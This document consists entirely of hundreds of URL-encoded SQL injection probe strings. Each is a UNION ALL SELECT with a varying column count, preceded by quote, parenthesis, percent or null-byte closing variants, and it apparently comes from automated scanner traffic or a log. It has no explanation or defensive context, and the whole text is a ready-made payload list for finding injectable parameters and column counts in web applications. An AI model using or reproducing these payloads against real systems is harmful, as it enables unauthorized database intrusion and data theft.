-1819%22%20UNION%20ALL%20SELECT%201852%2C1852%2C1852%2C1852%2C1852%2C1852%2C1852%2C1852%2C1852%2C1852%2C1852%2C1852%2C1852%23 -6341%22%20UNION%20ALL%20SELECT%204451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%23 -1855%22%20UNION%20ALL%20SELECT%205945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%23 -9625%22%20UNION%20ALL%20SELECT%209775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%23 -7185%22%20UNION%20ALL%20SELECT%205821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%23 -8512%22%20UNION%20ALL%20SELECT%206292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%23 -1332%22%20UNION%20ALL%20SELECT%206743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%23 -6703%22%20UNION%20ALL%20SELECT%209291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%23 -1338%22%29%20UNION%20ALL%20SELECT%202276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%23 -5252%22%29%20UNION%20ALL%20SELECT%204635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%23 -8386%22%29%20UNION%20ALL%20SELECT%208560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%23 -2493%22%29%20UNION%20ALL%20SELECT%201869%2C1869%2C1869%2C1869%2C1869%2C1869%2C1869%2C1869%2C1869%2C1869%2C1869%2C1869%2C1869%2C1869%23 -7909%22%29%20UNION%20ALL%20SELECT%207025%2C7025%2C7025%2C7025%2C7025%2C7025%2C7025%2C7025%2C7025%2C7025%2C7025%2C7025%2C7025%2C7025%2C7025%23 -6364%22%29%20UNION%20ALL%20SELECT%207676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%23 -6959%22%29%20UNION%20ALL%20SELECT%204437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%23 -9269%22%29%20UNION%20ALL%20SELECT%203376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%2C3376%23 -2853%22%29%20UNION%20ALL%20SELECT%205361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%2C5361%23 -7121%22%29%20UNION%20ALL%20SELECT%206537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%23 -4562%22%29%29%20UNION%20ALL%20SELECT%204346%2C4346%2C4346%2C4346%2C4346%2C4346%2C4346%2C4346%2C4346%2C4346%2C4346%23 -4398%22%29%29%20UNION%20ALL%20SELECT%203922%2C3922%2C3922%2C3922%2C3922%2C3922%2C3922%2C3922%2C3922%2C3922%2C3922%2C3922%23 -4889%22%29%29%20UNION%20ALL%20SELECT%203593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%23 -9491%22%29%29%20UNION%20ALL%20SELECT%208538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%23 -2088%22%29%29%20UNION%20ALL%20SELECT%207977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%23 -3379%22%29%29%20UNION%20ALL%20SELECT%206763%2C6763%2C6763%2C6763%2C6763%2C6763%2C6763%2C6763%2C6763%2C6763%2C6763%2C6763%2C6763%2C6763%2C6763%2C6763%23 -4147%22%29%29%20UNION%20ALL%20SELECT%208653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%23 -5231%22%29%29%20UNION%20ALL%20SELECT%207548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%23 -2070%22%29%29%20UNION%20ALL%20SELECT%202331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%23 -2750%22%29%29%20UNION%20ALL%20SELECT%207161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%2C7161%23 -9616%22%29%29%29%20UNION%20ALL%20SELECT%206182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%23 -4356%22%29%29%29%20UNION%20ALL%20SELECT%202453%2C2453%2C2453%2C2453%2C2453%2C2453%2C2453%2C2453%2C2453%2C2453%2C2453%2C2453%23 -4487%22%29%29%29%20UNION%20ALL%20SELECT%204425%2C4425%2C4425%2C4425%2C4425%2C4425%2C4425%2C4425%2C4425%2C4425%2C4425%2C4425%2C4425%23 -7114%22%29%29%29%20UNION%20ALL%20SELECT%202642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%23 -5583%22%29%29%29%20UNION%20ALL%20SELECT%208917%2C8917%2C8917%2C8917%2C8917%2C8917%2C8917%2C8917%2C8917%2C8917%2C8917%2C8917%2C8917%2C8917%2C8917%23 -5797%22%29%29%29%20UNION%20ALL%20SELECT%201685%2C1685%2C1685%2C1685%2C1685%2C1685%2C1685%2C1685%2C1685%2C1685%2C1685%2C1685%2C1685%2C1685%2C1685%2C1685%23 -1587%22%29%29%29%20UNION%20ALL%20SELECT%209721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%2C9721%23 -7267%22%29%29%29%20UNION%20ALL%20SELECT%204419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%23 -7506%22%29%29%29%20UNION%20ALL%20SELECT%205715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%2C5715%23 -4430%22%29%29%29%20UNION%20ALL%20SELECT%209012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%2C9012%23 -5235%22%20UNION%20ALL%20SELECT%206720%2C6720%2C6720%2C6720%2C6720%2C6720%2C6720%2C6720%2C6720%2C6720%2C6720%23 -9564%22%20UNION%20ALL%20SELECT%207826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%23 -4662%22%20UNION%20ALL%20SELECT%206770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%23 -8067%22%20UNION%20ALL%20SELECT%206260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%23 -3604%22%20UNION%20ALL%20SELECT%209649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%23 -6250%22%20UNION%20ALL%20SELECT%202668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%23 -8671%22%20UNION%20ALL%20SELECT%208069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%2C8069%23 -8460%22%20UNION%20ALL%20SELECT%204679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%23 -7017%22%20UNION%20ALL%20SELECT%202304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%23 -4806%22%20UNION%20ALL%20SELECT%201714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%23 -8296%25%27%29%20UNION%20ALL%20SELECT%201548%2C1548%2C1548%2C1548%2C1548%2C1548%2C1548%2C1548%2C1548%2C1548%2C1548%23 -9453%25%27%29%20UNION%20ALL%20SELECT%202263%2C2263%2C2263%2C2263%2C2263%2C2263%2C2263%2C2263%2C2263%2C2263%2C2263%2C2263%23 -2461%25%27%29%20UNION%20ALL%20SELECT%201213%2C1213%2C1213%2C1213%2C1213%2C1213%2C1213%2C1213%2C1213%2C1213%2C1213%2C1213%2C1213%23 -9945%25%27%29%20UNION%20ALL%20SELECT%207282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%23 -3211%25%27%29%20UNION%20ALL%20SELECT%201236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%23 -9704%25%27%29%20UNION%20ALL%20SELECT%204806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%23 -9887%25%27%29%20UNION%20ALL%20SELECT%207747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%23 -8448%25%27%29%20UNION%20ALL%20SELECT%204588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%23 -7127%25%27%29%20UNION%20ALL%20SELECT%203198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%2C3198%23 -3064%25%27%29%20UNION%20ALL%20SELECT%206975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%23 -8458%25%27%29%29%20UNION%20ALL%20SELECT%206950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%23 -5716%25%27%29%29%20UNION%20ALL%20SELECT%202390%2C2390%2C2390%2C2390%2C2390%2C2390%2C2390%2C2390%2C2390%2C2390%2C2390%2C2390%23 -3395%25%27%29%29%20UNION%20ALL%20SELECT%204641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%23 -1430%25%27%29%29%20UNION%20ALL%20SELECT%203209%2C3209%2C3209%2C3209%2C3209%2C3209%2C3209%2C3209%2C3209%2C3209%2C3209%2C3209%2C3209%2C3209%23 -6850%25%27%29%29%20UNION%20ALL%20SELECT%203157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%23 -2616%25%27%29%29%20UNION%20ALL%20SELECT%209574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%2C9574%23 -9295%25%27%29%29%20UNION%20ALL%20SELECT%202709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%2C2709%23 -1054%25%27%29%29%20UNION%20ALL%20SELECT%205572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%23 -8274%25%27%29%29%20UNION%20ALL%20SELECT%204187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%23 -1172%25%27%29%29%20UNION%20ALL%20SELECT%209789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%23 -3897%25%27%29%29%29%20UNION%20ALL%20SELECT%204419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%2C4419%23 -2961%25%27%29%29%29%20UNION%20ALL%20SELECT%204138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%23 -4738%25%27%29%29%29%20UNION%20ALL%20SELECT%201267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%23 -8925%25%27%29%29%29%20UNION%20ALL%20SELECT%207510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%23 -7723%25%27%29%29%29%20UNION%20ALL%20SELECT%207960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%23 -3165%25%27%29%29%29%20UNION%20ALL%20SELECT%207496%2C7496%2C7496%2C7496%2C7496%2C7496%2C7496%2C7496%2C7496%2C7496%2C7496%2C7496%2C7496%2C7496%2C7496%2C7496%23 -2359%25%27%29%29%29%20UNION%20ALL%20SELECT%207065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%23 -2120%25%27%29%29%29%20UNION%20ALL%20SELECT%209459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%2C9459%23 -6136%25%27%29%29%29%20UNION%20ALL%20SELECT%206270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%23 -3973%25%27%29%29%29%20UNION%20ALL%20SELECT%201053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%23 -4123%25%27%20UNION%20ALL%20SELECT%203923%2C3923%2C3923%2C3923%2C3923%2C3923%2C3923%2C3923%2C3923%2C3923%2C3923%23 -4452%25%27%20UNION%20ALL%20SELECT%205827%2C5827%2C5827%2C5827%2C5827%2C5827%2C5827%2C5827%2C5827%2C5827%2C5827%2C5827%23 -4406%25%27%20UNION%20ALL%20SELECT%207306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%23 -6229%25%27%20UNION%20ALL%20SELECT%205916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%23 -7702%25%27%20UNION%20ALL%20SELECT%207865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%23 -9215%25%27%20UNION%20ALL%20SELECT%207027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%23 -5002%25%27%20UNION%20ALL%20SELECT%205326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%2C5326%23 -2867%25%27%20UNION%20ALL%20SELECT%207136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%23 -8083%25%27%20UNION%20ALL%20SELECT%205017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%2C5017%23 -4856%25%27%20UNION%20ALL%20SELECT%209928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%2C9928%23 -6579%00%27%29%20UNION%20ALL%20SELECT%202893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%23 -3321%00%27%29%20UNION%20ALL%20SELECT%206583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%23 -7455%00%27%29%20UNION%20ALL%20SELECT%209951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%23 -8846%00%27%29%20UNION%20ALL%20SELECT%208232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%2C8232%23 -5806%00%27%29%20UNION%20ALL%20SELECT%206366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%23 -6509%00%27%29%20UNION%20ALL%20SELECT%203925%2C3925%2C3925%2C3925%2C3925%2C3925%2C3925%2C3925%2C3925%2C3925%2C3925%2C3925%2C3925%2C3925%2C3925%2C3925%23 -9509%00%27%29%20UNION%20ALL%20SELECT%202293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%2C2293%23 -6086%00%27%29%20UNION%20ALL%20SELECT%207348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%2C7348%23 -2010%00%27%29%20UNION%20ALL%20SELECT%209865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%23 -3535%00%27%29%20UNION%20ALL%20SELECT%203690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%2C3690%23 -7773%00%27%20UNION%20ALL%20SELECT%205304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%23 -6570%00%27%20UNION%20ALL%20SELECT%202736%2C2736%2C2736%2C2736%2C2736%2C2736%2C2736%2C2736%2C2736%2C2736%2C2736%2C2736%23 -2375%00%27%20UNION%20ALL%20SELECT%203897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%23 -4049%00%27%20UNION%20ALL%20SELECT%208095%2C8095%2C8095%2C8095%2C8095%2C8095%2C8095%2C8095%2C8095%2C8095%2C8095%2C8095%2C8095%2C8095%23 -6726%00%27%20UNION%20ALL%20SELECT%204945%2C4945%2C4945%2C4945%2C4945%2C4945%2C4945%2C4945%2C4945%2C4945%2C4945%2C4945%2C4945%2C4945%2C4945%23 -6045%00%27%20UNION%20ALL%20SELECT%201540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%23 -8432%00%27%20UNION%20ALL%20SELECT%207282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%23 -8387%00%27%20UNION%20ALL%20SELECT%201920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%23 -5360%00%27%20UNION%20ALL%20SELECT%207366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%23 -6030%00%27%20UNION%20ALL%20SELECT%203122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%2C3122%23 -1220%27%29%20WHERE%208649%3D8649%20UNION%20ALL%20SELECT%208649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%23 -5845%27%29%20WHERE%207913%3D7913%20UNION%20ALL%20SELECT%207913%2C7913%2C7913%2C7913%2C7913%2C7913%2C7913%2C7913%2C7913%2C7913%2C7913%2C7913%23 -2421%27%29%20WHERE%208500%3D8500%20UNION%20ALL%20SELECT%208500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%23 -7260%27%29%20WHERE%206619%3D6619%20UNION%20ALL%20SELECT%206619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%2C6619%23 -7521%27%29%20WHERE%206027%3D6027%20UNION%20ALL%20SELECT%206027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%23 -1732%27%29%20WHERE%203125%3D3125%20UNION%20ALL%20SELECT%203125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%23 -3801%27%29%20WHERE%202267%3D2267%20UNION%20ALL%20SELECT%202267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%23 -2083%27%29%20WHERE%208155%3D8155%20UNION%20ALL%20SELECT%208155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%23 -6294%27%29%20WHERE%203659%3D3659%20UNION%20ALL%20SELECT%203659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%23 -7507%27%29%20WHERE%206985%3D6985%20UNION%20ALL%20SELECT%206985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%23 -5223%22%29%20WHERE%207505%3D7505%20UNION%20ALL%20SELECT%207505%2C7505%2C7505%2C7505%2C7505%2C7505%2C7505%2C7505%2C7505%2C7505%2C7505%23 -1180%22%29%20WHERE%207411%3D7411%20UNION%20ALL%20SELECT%207411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%2C7411%23 -3593%22%29%20WHERE%208252%3D8252%20UNION%20ALL%20SELECT%208252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%23 -1649%22%29%20WHERE%204455%3D4455%20UNION%20ALL%20SELECT%204455%2C4455%2C4455%2C4455%2C4455%2C4455%2C4455%2C4455%2C4455%2C4455%2C4455%2C4455%2C4455%2C4455%23 -1399%22%29%20WHERE%208316%3D8316%20UNION%20ALL%20SELECT%208316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%23 -9303%22%29%20WHERE%203755%3D3755%20UNION%20ALL%20SELECT%203755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%23 -4916%22%29%20WHERE%208887%3D8887%20UNION%20ALL%20SELECT%208887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%23 -3219%22%29%20WHERE%205006%3D5006%20UNION%20ALL%20SELECT%205006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%2C5006%23 -2744%22%29%20WHERE%209646%3D9646%20UNION%20ALL%20SELECT%209646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%23 -6703%22%29%20WHERE%205233%3D5233%20UNION%20ALL%20SELECT%205233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%2C5233%23 -9397%29%20WHERE%208913%3D8913%20UNION%20ALL%20SELECT%208913%2C8913%2C8913%2C8913%2C8913%2C8913%2C8913%2C8913%2C8913%2C8913%2C8913%23 -8159%29%20WHERE%207433%3D7433%20UNION%20ALL%20SELECT%207433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%23 -4368%29%20WHERE%206388%3D6388%20UNION%20ALL%20SELECT%206388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%23 -2170%29%20WHERE%202604%3D2604%20UNION%20ALL%20SELECT%202604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%23 -9706%29%20WHERE%202659%3D2659%20UNION%20ALL%20SELECT%202659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%23 -7446%29%20WHERE%207804%3D7804%20UNION%20ALL%20SELECT%207804%2C7804%2C7804%2C7804%2C7804%2C7804%2C7804%2C7804%2C7804%2C7804%2C7804%2C7804%2C7804%2C7804%2C7804%2C7804%23 -6471%29%20WHERE%208512%3D8512%20UNION%20ALL%20SELECT%208512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%23 -3824%29%20WHERE%208044%3D8044%20UNION%20ALL%20SELECT%208044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%23 -8012%29%20WHERE%205669%3D5669%20UNION%20ALL%20SELECT%205669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%2C5669%23 -5425%29%20WHERE%203437%3D3437%20UNION%20ALL%20SELECT%203437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%2C3437%23 -1774%27%20WHERE%204493%3D4493%20UNION%20ALL%20SELECT%204493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%23 -6713%27%20WHERE%206089%3D6089%20UNION%20ALL%20SELECT%206089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%23 -8333%27%20WHERE%202644%3D2644%20UNION%20ALL%20SELECT%202644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%23 